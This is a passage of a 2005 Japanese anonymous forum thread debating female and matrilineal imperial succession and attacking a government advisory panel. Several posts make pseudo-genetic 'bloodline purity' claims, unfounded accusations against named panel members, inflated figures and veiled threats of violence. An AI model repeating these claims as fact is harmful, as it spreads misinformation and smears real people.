383 :名無しさん@6周年:2005/11/21(月) 23:54:35 ID:745Tt0gE0
>>379
「天皇愛子」じゃなくて「皇太子愛子内親王」の頃だろうな。
ご結婚してお子さんが生まれるとすれば。だから20年後くらいかも。

384 :名無しさん@6周年:2005/11/21(月) 23:55:13 ID:+nbwawYmO
>>378
あと何故かギリシャ神話と共通点が多い

385 :名無しさん@6周年:2005/11/21(月) 23:56:02 ID:H4ANYLVs0
>>382
乙。でも今日はもう夜遅いから明日にしな。

今日はとりあえずメル凸にしときな。国会議員に。名前をつけるとなお信頼度が上がるし返信くる確率も上がる。

お互い頑張ろうな。

386 :名無しさん@6周年:2005/11/21(月) 23:57:16 ID:TBWuynXf0
367 名前:名無しさん@6周年 本日のレス 投稿日:2005/11/21(月) 23:43:31 sws2cWFz0
>>360
特高警察も何も名誉毀損は民間人相手でも犯罪だろ。
ちなみに不敬罪はちゃんとある。


こいつ逃げちゃったな。
哀れw

387 :名無しさん@6周年:2005/11/21(月) 23:57:25 ID:w6QMk5BC0
>>379
しかし、そのお相手が見つかるのか?
そもそも、英国風に「天皇の夫」とかいう地位を作るのか?
「有識者」どもの考えは安直に過ぎますよ。

388 :名無しさん@6周年:2005/11/22(火) 00:00:04 ID:NGqZOBX40
新しく天皇になる者が大嘗祭で神と同化し現人神となる。
女系になった場合、この大嘗祭を取り仕切る一族が動かないんじゃないか?

神道関係者の意見は出ないのか?だれか頼むよ。本当に。

389 :名無しさん@6周年:2005/11/22(火) 00:00:20 ID:6N6hqMa50
女しか生まれていないからって何故わざわざ女でも長子優先になるんだ?
秋篠宮に息子が生まれたりしたら素直にそっちを認めればいいし、愛子の弟が生まれても同様。
もしそうなったらこいつらの主張は皇族を増やして、税金の無駄遣いをしようということに他ならない。

390 :名無しさん@6周年:2005/11/22(火) 00:00:47 ID:dlN6Zk9C0
有識者会議の基地外は、親しみやすさが大事と言っているようだが、
それはあくまでも歴史の重み、高貴な皇統が前提としてあるからで、
それにより自然と敬う気持ちが生まれ、その延長線上に親しみが生まれるのである。

単に親しみやすければいいのなら、ただの芸能人と変わらん。
そんな天皇という芸名のタレントなんかに税金を使うのはアホらしい。
そんな事するなら天皇制自体を失くしたほうがマシなんだよ

391 :名無しさん@6周年:2005/11/22(火) 00:01:18 ID:FW7/XPXq0
改正皇室典範のもとで万世一系が崩壊するのは愛子が死んだとき
なわけでそれまでにまた皇室典範が改正されることもあるんじゃな
いか?
旧宮家復活させるいい方策が見つかるんじゃないか?

392 :名無しさん@6周年:2005/11/22(火) 00:02:31 ID:8Nyaq4/aO
318さん

その親王の養子方式とは、どういうものですか?

その親王はいつの時ですか?

ケータイで見れるブログはありますか?

393 :名無しさん@6周年:2005/11/22(火) 00:03:10 ID:RgrVfZZn0

伝統が因習に変わることもある。因習のままで良いものも、ある。
でも、この問題はまずいんじゃないかい。下手すればアスベスト以上よ。

ア ス ア ウ ト よ 。(by 松本人志風)

394 :名無しさん@6周年:2005/11/22(火) 00:03:59 ID:TKlHXsgM0
>>388
神社本庁は「女系はありえない。しかも男系男子優先」で声明出してる。
でもあれこれとは言いづらいんだろうな。ちなみに先号の「神社新報」には、
神道者は積極的に声を挙げて訴えていくべきだとしていた。
ゴーサインだといいね。

395 :名無しさん@6周年:2005/11/22(火) 00:06:04 ID:ep6yuPmU0
>>385
今すぐ電話しろという意味にとれてしまいましたか、失礼しました。
メールは思いつく限り送ってますよ。お互い頑張りましょう!

>>388
神道関係者が口を開くと、「政教分離」を口実にサヨが勢いづくからタイミングが
難しいよ。似た理由で陛下のご発言も、少なくとも直接的な形では賜る事は困難だ
ろう。宮内庁主導で、陛下が「女性」天皇を容認されるようなご発言(「政府方針
に従う」「愛子に皇位継承があっても良い」など)をなされる可能性もある。それ
を「女系」天皇を認めたのだとしてバカどもが騒ぎ立てる可能性も考えておいた方
がよい。

っていうか、そういうバカにはこの予言を見せてやってくれ。

396 :名無しさん@6周年:2005/11/22(火) 00:06:26 ID:1ChXwZX20
>>389
今は皇太子様、秋篠宮様のお二人だが、もっと兄弟がいて年齢が離れた場合、
兄方のお子さんが女子ばかりなら、弟の子供生まれるまで後継者候補として育てられない


397 :名無しさん@6周年:2005/11/22(火) 00:06:59 ID:Do/gGw3A0
>390 それが目的だ。

最終的には天皇制を廃止。
国民の認識が芸能人と変わらなくなり、スキャンダルとか
持ち出して、天皇制要らない、という風潮にもっていく。


398 :名無しさん@6周年:2005/11/22(火) 00:07:13 ID:iuyD6v9N0
残念。もう時間切れ。小泉首相の私的諮問機関の案がそのまま通って、
愛子様天皇→天皇廃止の道に進むこと決定〜。

>>394
神社にとっては不幸な話だな。これで神道も終わりかもしれんね。

399 :名無しさん@6周年:2005/11/22(火) 00:08:49 ID:V8Cb/lKd0
>>395
おう。俺は知人への啓蒙もあわせて行なってるよ。
以外とすんなりみんな納得してくれるよ。

あと、平成生まれの子供達に話す機会が多いので天皇についての話をして、有識者会議はありえないっていう結論でまとめてるw
とにかく、憲法問題とかでもめてこの法案が流れるように持っていかなくては。

だから俺は9条でもメル凸電凸してる。
頑張ってくれ。俺は明日が早いから寝る。

400 :名無しさん@6周年:2005/11/22(火) 00:09:03 ID:gsOXm+EGO
一番困っているのは陛下だろうな
女系なんてものが有り得ないと理解している立場なだけに


401 :名無しさん@6周年:2005/11/22(火) 00:09:20 ID:TKlHXsgM0
>>398
国会で一回通った「法律」が永久不変のもんじゃなかろうに。
権力主義もたいがいにせぇ。アホかw

402 :名無しさん@6周年:2005/11/22(火) 00:10:06 ID:1ChXwZX20
>>400
そうかな?


403 :名無しさん@6周年:2005/11/22(火) 00:10:55 ID:8Nyaq4/aO
388
394さん

それは、イギリスの戴冠式みたいな意味で、また一度きりのものですか?



404 :名無しさん@6周年:2005/11/22(火) 00:13:15 ID:Qv0/qK3t0
めんどくさいからもうやめたら?
憲法改正のついでに1章削除。1条だけ「主権は国民に存する」って
書いておけば解決だろ?

405 :名無しさん@6周年:2005/11/22(火) 00:14:05 ID:0lE31cKK0
とりあえず愛子を次期天皇にするように、男系の長子が後継者になるようにして、同時に旧宮家を復帰。
愛子の在位中に旧宮家の男系男子を教育+衆目に晒されるのに慣れさせる+国民の認知度を上げる。
これでいいんじゃね?

406 :名無しさん@6周年:2005/11/22(火) 00:15:59 ID:iuyD6v9N0
>>401
一度皇室典範の改正が通ったら、それで全ては仕舞さ。
もう一回変えるなんてことが、本気でできるとでも思ってんのかw
それがどういう意味か分かってるか?「愛子様は天皇とは認めない」と言ってるのに等しいんだぜ。
無理無理絶ッ対無理。認めるならまだしも認めない方向へなど変えられるものか。


407 :名無しさん@6周年:2005/11/22(火) 00:16:26 ID:ek4xVrFr0
>381
なんだ、ノンポリか?

まあ、現状に色々不満が有るんだろうけど、嫌がらせはイカンヨ。
それにどうでもいい事じゃないのよ。君も日本人ならお宮参りぐらい行くだろう?
また、子供ができれば七五三にも連れて行くだろう?
自分は無宗教だからと言ってても、実際は無意識に神道のしきたりを行っているんだから。

天皇は誤解を恐れずに言えば、一番偉い神主なのよ。その権利(神権)を持ってない者は
天皇になれないの。君はどこかの国の王様と天皇は同じような物と思ってないか?
例えれば、ローマ法王やダライラマみたいなもんだから。よ〜くかんがえて!よろしく。

408 :名無しさん@6周年:2005/11/22(火) 00:17:31 ID:MC9mSR8X0

要するに、東久邇家などの旧皇族が、男系として、天皇と祭祀を引きつぎ、

暫定的に愛子を日本国王に任命するということだろうな。実質的に。
愛子王朝はすぐ廃止になり、また、200年後ぐらいに、
連綿と続いた正式な天皇を、元首として、お連れすることになるだろう。

とにかく、女系天皇を認めるのなら、俺はその時点から、昭和系の今の
天皇家は支持せんよ。税金の無駄遣いだから、いますぐ、
黒田家にでも、いそうろうしてくれ。

東久邇家などの、旧皇族を皇居に迎えたほうがいいだろう。


409 :名無しさん@6周年:2005/11/22(火) 00:18:42 ID:TKlHXsgM0
>>403
イギリスの場合はよくしりません。あそこは、イングランド国王が
英国国教会(アングリカンチャーチ)の首長を兼ねることになって
いるので、戴冠式が政治上、宗教上、どういう意味があるのか・・・

大嘗祭は、宮中で毎年行われている「新嘗祭」(秋の収穫感謝の神事)
の大きなもので、即位式とは別に行われるもの、即位した新帝が行う
一代一回の神事です。皇祖皇宗ほか神霊をお招きして、「神人共食」
をします。詳しいことはしりません。

でも、考えたら確かに、神武の皇胤ならざる「偽帝」が大嘗祭を
行えるのか、わたしは非常に疑問・・・

410 :名無しさん@6周年:2005/11/22(火) 00:20:12 ID:2ugRukZg0
>>405
別に愛子を即位させる必要はないと思う。
だって、皇太子死ぬの下手すると半世紀後だぜ。
皇太子→秋篠宮→旧皇族
又は
皇太子→旧皇族
でいいと思う。
皇太子が死ぬまでの40〜50年の間に、旧皇族が国民によく知られるようにすればいいと思う。

411 :名無しさん@6周年:2005/11/22(火) 00:21:44 ID:iuyD6v9N0
>>407
その神道の伝統そのものが変質していくんじゃないかなぁ。
伝統も、社会の方が変わってしまえば変わるものだよ。
どうやら今の政府は天皇制などいらんとしか思ってないみたいだし、
国民の方もそれにテロや抗議行動を行おうとしている様子はない。

伝統も、そのままの形でいつまでも続くものじゃないさ。
天皇という形は、もうすぐ終わりだ。多分。

412 :名無しさん@6周年:2005/11/22(火) 00:22:49 ID:2ugRukZg0
>>406
国民はそこまで愛子マンセーではないと思う。たがが女児に敬意をよせる人間は普通いない。いたとしても、マインドコントロールされているだけ。
でも、君のいうことはわかるよ。
有識者会議をいかに叩くかというのが重要だと思う。

413 :名無しさん@6周年:2005/11/22(火) 00:24:45 ID:D0sp9PsC0
>>411
男系支持派だが俺もそう思うよ。
明治に天皇を神格化したところからおかしくなったのか、
戦後からおかしくなったのか。
まぁ残念で有ることには違いない。

414 :名無しさん@6周年:2005/11/22(火) 00:25:13 ID:bcRAMeUm0
>>410
そうそう。それでいいのに、無理して焦って密室会議で愛子を皇太孫にしようとしてるのが妙なんだよね。
もっとじっくりと広く意見を募って考えるべき問題なのに。

415 :名無しさん@6周年:2005/11/22(火) 00:25:22 ID:DnZr1+EM0
伝統はどうでもいいけど、宮家の大量増殖で(1宮家ごとに年間3000万!)
お金がかかりすぎるのが嫌だ。

年間3万人も自殺してる世の中(その多くが生活苦)なのに。

416 :名無しさん@6周年:2005/11/22(火) 00:28:36 ID:TKlHXsgM0
>>411>>413
神道も歴史的にはいろいろ変遷がありますが、でも、
神話伝承を切断するところに成立するものが、たとえ
法律上の名を「天皇制」としたところで、どうかなぁ。
信仰を曲げて法律に従え!みたいな話になるしね。

417 :名無しさん@6周年:2005/11/22(火) 00:29:01 ID:MC9mSR8X0
>>411

でも、天皇家の呪いというのは怖いよ。
そりゃ、そうやすやすと呪いが発動するわけじゃないので、
今は、まだその時期じゃないということだろう。

今の日本国が天皇制を廃止した場合、歴史的にみれば、
滅ぶのは日本国のほうだろうね。また、新しい勢力が男系天皇を担いで、
新日本国を起こすだろうだろう。

150年前には、藩閥体勢が滅んだように、
次に天皇が担がれるときは、国家や民族主義が滅ぶかもしれん。
台湾政府が天皇家を担いで、日本に進軍してくるかもしれんよ。


418 :名無しさん@6周年:2005/11/22(火) 00:30:16 ID:iuyD6v9N0
>>412>>413
大体同意してもらえたってことかな?

俺も別に天皇に恨みも何もないし、あっても別に困るわけじゃないし、
伝統も維持したいという人たちがいることも分かるが。
潰す方向に持っていきたい人たちが圧倒的な力を持ってて、
しかも国民の大多数はそれを許してるんだ。どうしようもあるまいよ。
天皇制を維持できる世の中じゃなくなったのだ。

419 :名無しさん@6周年:2005/11/22(火) 00:30:51 ID:6QB5A7VC0
>>399
子供には古事記か日本書紀の現代語訳を読ませるのがいい。
ヤマタノオロチや因幡の白兎くらいは知ってても、体系的に読んだことのある子はまずいないからね。
バカでドジでスケベな神様たちの話は誰が読んでも面白いものだし、そんな神様の末裔が今の
天皇陛下だという伝説を教えれば必ず歴史に興味を持つ。
テレビやマスコミが作り出した「天皇ご一家」ではなく、われわれ日本人の原点を伝える存在としての
皇族の存在価値を知ることが、皇統を守ることの重要性を認識する第一歩だと思うよ。

420 :名無しさん@6周年:2005/11/22(火) 00:31:46 ID:dlN6Zk9C0
>>410
だから今から旧宮家を復帰させないといけない。
まだ皇籍を剥奪されてからたったの60年しか経っていない。
今なら、旧皇族のことをちゃんと知っている人も居るから説明すれば問題ない。
もっと後になってからでは段々難しくなってきてしまう

421 :田舎者:2005/11/22(火) 00:33:26 ID:5MRx2t1b0
・天皇制は廃止。
理由:雅子が男を作れないため断絶とする。
・日本国経営危機でもあり、ここで宮内庁を解体すれば
 日本国のため民のためになる。
・但し断絶後も天皇家一代限り天寿をまっとうするのでの経費は
 日本国の民が支払うものとする。

422 :名無しさん@6周年:2005/11/22(火) 00:33:30 ID:gsOXm+EGO
>>411
宗教ってのは最も頑固な存在なんだよ
今は様子見していても制度が納得のいかないものを押し付けてきた場合は間違いなく拒否する
たかだかカルトの信者ですら頑固なのに伝統を背負っている宗教家は決して軽くないよ

423 :名無しさん@6周年:2005/11/22(火) 00:35:44 ID:qUXfIsTW0
>>415
つ「ミサイルになって帰ってくる中国への何百兆円もののODA」

424 :名無しさん@6周年:2005/11/22(火) 00:35:49 ID:NtZXam8s0
もしかして、有識者会議のあまりなアレぶりに
議員さん達もヤバいと気づいたってことですか??

425 :名無しさん@6周年:2005/11/22(火) 00:36:20 ID:iuyD6v9N0
>>417
それを社会が望むならそういう抗争が起きてもおかしくないけどな。
俺は天皇家があっさり滅びて終わりだと思うぞ?
そのとき日本がどう変わるのか、となるとこれは分からないが。

>>420
無理。諮問機関が完全否定してました。で、小泉直属なので彼らに逆らえるものは誰もいないっす。



426 :名無しさん@6周年:2005/11/22(火) 00:39:02 ID:ek4xVrFr0
>421
いや、天皇は親から子へ引き継ぐ物じゃないから。
それに皇室に使われてる予算なんて、中国へのODAに比べたら微々たるものだから。

427 :名無しさん@6周年:2005/11/22(火) 00:39:23 ID:MC9mSR8X0
>>421

愛子は、ヒルズ族のタマのこしに乗ればいいだけじゃん。
なんで、国民が面倒みなきゃならんのだよ。

つうか、今回の決定は、
愛子の人生をボロボロにするという自覚はあるんだろうか?
有識者会議さんよ。

女系天皇を認めるのなら、
天皇制廃止(天皇は国家が面倒みない)という選択肢もあるよな。

俺は、女系には乗っ取りがつき物だから、
日本が神武系以外に乗っ取られるぐらいなら、
天皇と国家を切り離してほしいね。



428 :名無しさん@6周年:2005/11/22(火) 00:43:21 ID:MC9mSR8X0
>>425

織田信長がなんで本能寺で暗殺されたか知っている?
ところで、織田信長はなんで重臣を遠ざけて、
本能寺にいたか知っている?
織田信長の手法って、病気と偽って、実の弟を殺した奴だよね。

小泉はよく織田信長と比較されるけどね。


429 :名無しさん@6周年:2005/11/22(火) 00:43:35 ID:gsOXm+EGO
>>425
男系男子がたくさんいるのだから滅びようがないんだよ
社会も情報が行き渡るほど右傾化で邁進していくのだし正統性を持つモノの意味はますます強くなる

430 :名無しさん@6周年:2005/11/22(火) 00:44:58 ID:bZ7TzNHd0
日本の神道を共産主義に売った者には国民が報復しますよ。

431 :名無しさん@6周年:2005/11/22(火) 00:46:05 ID:dlN6Zk9C0
ついこの間皇籍を剥奪された本物の皇族の復帰は認めないのに
これから皇族と結婚した一般人の皇族入りはバンバン認めるというのはなぜんだ?
国民にとって分かりやすい、親しみやすいから。
そんなのは強引なこじつけだな。

本音はこの女系容認派メンバーは、皇族を皆殺しにして根絶やしにしたいんだろう?
しかし現代の時代でそんな事は実際にはできないから
このような間接的な卑劣なやり方で皇統に繋がる皇族を消していく計画か。
こいつら絶対呪われるね

432 :名無しさん@6周年:2005/11/22(火) 00:51:09 ID:7PbDOICQ0
民主党幹事長の鳩山や静岡県知事が女系にたいして懐疑的な意見を表明できたのは
三笠宮の本心が分かったからでしょう?
今までは皇族の本心が分からなかったから動きようがなかった。

だから、陛下が鈴木貫太郎や入江氏と同じような見解を表明されたなら
安倍らも動きやすいわけで。

それで皇室終了の危険性もあるが
実際、皇室が即、終了になるかというと、改憲しなきゃいけないわけだから、
急にはそういう動きにはならないし、
皇室が民間に下るということは、虎が野に放たれるのに等しいから
急に廃止には行かないよ。
それに、法的な皇室が廃止になっても、皇統が断絶するという意味ではない。

433 :名無しさん@6周年:2005/11/22(火) 00:56:35 ID:iuyD6v9N0
>>428
そうだな。かつては消すことができない程の伝統だったのだろう。
今はどうなのか?過去には無かったほどの、転換点なのかもしれない。
天皇制が終わるかもしれないような決定が、こんなに静かに決まるとは思ってなかったろ?
静かなんだよ。皆、それを止めようとする情熱も忠誠も宗教心も失ったんだ。

>>429
もう天皇制は終わった、と人々が認識すればそれで終わりなんだ。
徳川も織田も血筋は残ってるのかもしれんが、もう終わった。

434 :名無しさん@6周年:2005/11/22(火) 01:06:26 ID:glG/8oK/o
この時代に生きる我々は非常に罪深い
ご先祖様に顔向け出来ない

435 :名無しさん@6周年:2005/11/22(火) 01:07:03 ID:kghKTg110
終わった→ポストモダン。まったくどうしようもないね。この手のやつは。
そこには何も無いことに、気がついちゃいない。

436 :名無しさん@6周年:2005/11/22(火) 01:07:56 ID:a5Ip0WUkO
ぬるぽ

437 :名無しさん@6周年:2005/11/22(火) 01:41:31 ID:qGmKmSpI0
俺としては、天皇は アメリカ大統領が白タイで空港まで出迎える
世界で3人しかいない国賓

天皇陛下・ローマ法王・ 英国女王

だけだが、女性天皇だと これが格下げにならないかどうかが心配。

438 :名無しさん@6周年:2005/11/22(火) 01:51:18 ID:x7UEP+B60
つーか、女系なんて認めたら、死人が出るのは確実でしょ。

それより。
ノンポリ一般人で皇室に思いがある人には、
血統原理よりも、皇室の”祖先信仰”が何であるかを中心に理解を求めないといけないと思う。
 つまり、書物の上の神武皇統(神武系統)よりも
『伝統(男系)の皇位継承ルールをやぶるのは、”伊勢神宮を皇室から取り上げる”のと同じ』
といった方が強烈だと自分は思う。

有識者会議のメンバーのひとりの 久保 正彰 東京大学名誉教授 は、
「たとえば、北陸地方の田舎町に住んでいる高齢者や、九州、四国の農村に
行って話を聞いてみると、彼らは心の奥底に象徴天皇に対する思いを大切に持っている。
そんな意見こそ聞くべきだと思います。」(週刊現代12月3日)
と言っている。
 ならばだ、
その彼らは”伊勢神宮を皇室から取り上げる”事に、果たして賛成するだろうか?
 そうまでして昭和天皇、今上天皇、皇太子殿下の直系へ受け継いで欲しいなどと思うだろうか?
要は、皇室が何を望まれているかを拝察し、その思いを実現するにはどうすれば良いかを
理解してもらうのが重要だと思う。
 伝統が切れてもったいないとか、米国大統領がホワイトタイとか、そういう事では、
こうした人たちの心をつかむことはできないと思う。



439 :名無しさん@6周年:2005/11/22(火) 02:01:59 ID:pJ7dXXYf0
http://www.public-success.com/kokumin/q.php?qid=12

440 :名無しさん@6周年:2005/11/22(火) 02:36:32 ID:vU62Yv9W0
>>438
その、あの、男系へのこだわりがある方から、
「死人が出る云々」言われると、マジで怖いです。

でも、おそれず、ひるまず、とらわれず 申し上げます。

当人の意思、そして憲法だと思います。

441 :名無しさん@6周年:2005/11/22(火) 02:44:48 ID:7PbDOICQ0
>>437
こういうスレの多くが、外交上の天皇の地位に拘る香具師が多いが
自分は思うに、皇室外交なるものは
いらないように思う。

皇室にとって重要なのは、過去の日本の精神的な伝統。
それを体現するのに、神道や万世一系が重用だったりする。


442 :名無しさん@6周年:2005/11/22(火) 02:52:33 ID:b+WUZpLp0
皇室典範に関する有識者会議メンバーの素性

岩男壽美子 武蔵工業大学教授
・男女共同参画運動に関わっていた人間
・ジェンダーフリー論者

緒方貞子
・国際協力機構理事長
・今問題になっている「人権擁護法案」を熱心に推進
・国連人権委員会日本政府代表として人権擁護法案を日本に持ち込んだ張本人の一人
・町村外相が分担金削減を申し入れた問題に対して中国やロシアを代弁をした

奥田碩 日本経済団体連合会会長」
・靖国問題その他で常に中国の意向に添った発言をすることで有名

笹山晴生 東京大学名誉教授
・建国記念日に反対を唱えている日本歴史学協会に所属・超左翼の歴史家

古川貞二郎 前内閣官房副長官
・副官房長時代、北朝鮮との裏交渉段階で安倍晋三官房副長官(当時)を蚊帳の外に置くことに荷担

佐藤幸治 近畿大学法科大学院長、京都大学名誉教授
・人権関係に力を入れた講義を行っている左翼

園部逸夫 元最高裁判所判事
・強烈な政教分離の主張者!(玉串判決に関わる)

吉川弘之 産業技術総合研究所理事長、元東京大学総長
・ロボット工学をやって皇室を操り人形にすると言う、小泉首相の意図を代表する輩なのか?

443 :名無しさん@6周年:2005/11/22(火) 02:53:17 ID:G6mqiIAr0
20XX年 新年一般参賀

長和殿ベランダにお出ましになられたのは
愛子天皇陛下、民間庶太郎皇婿殿下
与太郎皇太子、ハナコ皇太子妃両殿下、雅子皇太后陛下

444 :名無しさん@6周年:2005/11/22(火) 04:20:01 ID:tU1zx53C0
  皇室と王室を勘違いしてるな、女性天皇容認派は。

はっきり言って女系天皇容認の人は、何もしらされずに
容認していると思う。天皇と皇室は一系遺伝の系譜。
王室は遺伝の血統を守らない、他国の元首を迎えている方式。

現皇室は、愛子様以外も女系。要するに女性で遺伝血統を作った
場合は、男子Y系遺伝が無く、血筋が受け継がれない。
遺伝学では男子が元の遺伝を保持しているからだ。

★女性が血統を継ぎ、次も女性であらばそこで滅ぶのだ。
女性天皇を今配列させると、民間人であるなんでもない
遺伝子を保有したクロダ家、オワダの遺伝を今後受け継いでしまう。

★これでは皇室の意味がなく、雑種といえよう。
(雑種とは失礼な表現ですまない。書いてる私もゴミ雑種だ)

天皇はギョクタイであられる。日系の遺伝を二千年継承する
究極の遺伝保有者であられる。これは大和・日本・和の
民が、繁栄と歴史を受け継ぎ、それを生きた歴史として証明した。

445 :名無しさん@6周年:2005/11/22(火) 04:51:00 ID:YILLb9KC0
>>440
日本の歴史を怖がることないでしょ。日本人なら。

446 :名無しさん@6周年:2005/11/22(火) 04:58:09 ID:lQlExoy/0
国会議員一覧
http://www.jimin.jp/jimin/main/hp.html
http://www.janjan.jp/link/sogo/giin/kokkaigiin.php
http://www.geocities.co.jp/WallStreet/1251/


447 :名無しさん@6周年:2005/11/22(火) 05:00:41 ID:fd2SslV30
>>442
なんでこんな変なメンツ選んだんだろう??
本当に謎だ。

つか有識者会議そのものが謎。
皇室と関係のない奴らが決める事か??

448 :名無しさん@6周年:2005/11/22(火) 05:05:05 ID:YILLb9KC0
つーか、女系なんて認めたら、死人が出るのは確実でしょ。

それより。
ノンポリ一般人で皇室に思いがある人には、
血統原理よりも、皇室の”祖先信仰”が何であるかを中心に理解を求めないといけないと思う。
 つまり、書物の上の神武皇統(神武系統)よりも
『伝統(男系)の皇位継承ルールをやぶるのは、”伊勢神宮を皇室から取り上げる”のと同じ』
といった方が強烈だと自分は思う。

有識者会議のメンバーのひとりの 久保 正彰 東京大学名誉教授 は、
「たとえば、北陸地方の田舎町に住んでいる高齢者や、九州、四国の農村に
行って話を聞いてみると、彼らは心の奥底に象徴天皇に対する思いを大切に持っている。
そんな意見こそ聞くべきだと思います。」(週刊現代12月3日)
と言っている。
 ならばだ、
その彼らは”伊勢神宮を皇室から取り上げる”事に、果たして賛成するだろうか?
 そうまでして昭和天皇、今上天皇、皇太子殿下の直系へ受け継いで欲しいなどと思うだろうか?
要は、皇室が何を望まれているかを拝察し、その思いを実現するにはどうすれば良いかを
理解してもらうのが重要だと思う。
 伝統が切れてもったいないとか、米国大統領がホワイトタイとか、そういう事では、
こうした人たちの心をつかむことはできないと思う。



449 :名無しさん@6周年:2005/11/22(火) 05:20:42 ID:UpkiZtD10
道鏡以来の危機かな。
神話時代から続いた日本の平和な時代も終わりかな。

450 :名無しさん@6周年:2005/11/22(火) 11:40:05 ID:SpJOReVJ0
小和田簒奪王朝反対!

「女性」も「女系」も両方反対
断固男系男子維持すべし

皇太子→秋篠宮→傍系男系男子

451 :名無しさん@6周年:2005/11/22(火) 12:11:05 ID:3ony3PQd0
おすすめ。日本における天皇の必要性に関する考察。

日本の君主制―天皇制の研究 「昭和を読もう」葦津珍彦の主張シリーズ (1)
葦津 珍彦 (著), 葦津珍彦の主張普及発起人会

# 単行本: 235 p ; サイズ(cm): 19
# 出版社: 葦津事務所 ; ISBN: 4901577026 ; (2005/04)

http://www.amazon.co.jp/exec/obidos/ASIN/4901577026/

452 :名無しさん@6周年:2005/11/22(火) 13:11:49 ID:b+WUZpLp0
http://antilabor.cocolog-nifty.com/blog/2005/10/post_27da.html
より抜粋。

園部逸夫座長代理の持論は伝統否定容認論なので偏った人選だった

 有識者会議の人選については発足当初から指摘されていたことだが、
やはり偏っていると思います。例えば行政法の専門家で元最高裁判事
の園部逸夫が座長代理として会議をリードしている。

園部の『皇室法概論』(第一法規2002年)を読むと以下に引用する
とおり憲法第二条の世襲規定には女系を含むとされ、もともと歴史・伝
統的脈絡にこだわらない人であるということがわかる。



453 :名無しさん@6周年:2005/11/22(火) 13:19:04 ID:b+WUZpLp0
皇室問題参考サイト

http://www.angelfire.com/journal2/hikojuro/
女性天皇に賛成。女系天皇に反対!

http://plaza.rakuten.co.jp/kawamurakent/diary/200511050000/
「皇室典範に関する有識者会議」意見陳述資料

http://blog.goo.ne.jp/nipponnippon_2005/e/c2cc803a4d0b44abd0aaf80c021283f6
女性・女系天皇に対する疑問

http://waqoo.blog16.fc2.com/blog-entry-52.html
シリーズ:皇位継承を考える

http://kahkun3601.at.webry.info/200511/article_6.html
皇室典範を改変する資格

http://antilabor.cocolog-nifty.com/blog/2005/10/post_27da.html
最悪だ!皇室典範に関する有識者会議は直ちに解散すべきだ


454 :名無しさん@6周年:2005/11/22(火) 13:33:43 ID:l9udytEk0
>>332
父親が天皇でなくとも、少なくも男系男子であれば、
その人の子は男系ですよ。


455 :名無しさん@6周年:2005/11/22(火) 13:42:53 ID:NWyKXbn50
愛子天皇はインド人と結婚しインド人の皇族が新たに誕生しました。
愛する夫の強い希望で我が国の国教ははヒンズー教になりました。
天皇は女系で繋ぐことになっているので愛子天皇の長女のカキ子
皇太子がその後を継ぎカキ子天皇はイラク人と結婚しました。
愛する夫の強い希望で今度はイスラム教国になりました。

456 :mark-sesson ◆OOuOpXqoBQ :2005/11/22(火) 21:06:39 ID:ILItrqcV0
「男系」「女系」と言うからジェンダーフリー教のカルト信者が

「まあ━━J(゚д゚)し━━!!!男系は女性差別」

とか言い始めるんですよ。ここは「神武系の男女」と表現したほうが
良いかと思います。

457 :名無しさん@6周年:2005/11/22(火) 21:25:30 ID:PzQ3I24p0
>>243
やむなしといってる時点でここ一番で逃げるのは確実

大前繁雄は北朝鮮問題に取り組んでいるふりをしているだけ
落ちてしまえばいい

458 :名無しさん@6周年:2005/11/22(火) 22:22:41 ID:ZMdm/vZC0
日本の歴史上天皇制に危機をもたらしたのは奈良時代の道鏡、室町時代の足利義満
戦国時代の織田信長、第二次大戦後のトルーマン。

459 :名無しさん@6周年:2005/11/23(水) 00:03:13 ID:dW7Tsij50
>>1
まあしっかり勉強しないと藪をつついて蛇がでてくるぞ。

天皇制廃止という蛇がね。


>、「何が問題点かを理解している議員も少ないだろう」(政府高官)というのが現状だ。

世襲制問題があると結論でたらどうするのだろう?


460 :名無しさん@6周年:2005/11/23(水) 04:01:39 ID:9kOdPZL20
>>459
ありえない仮定だな。


193 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)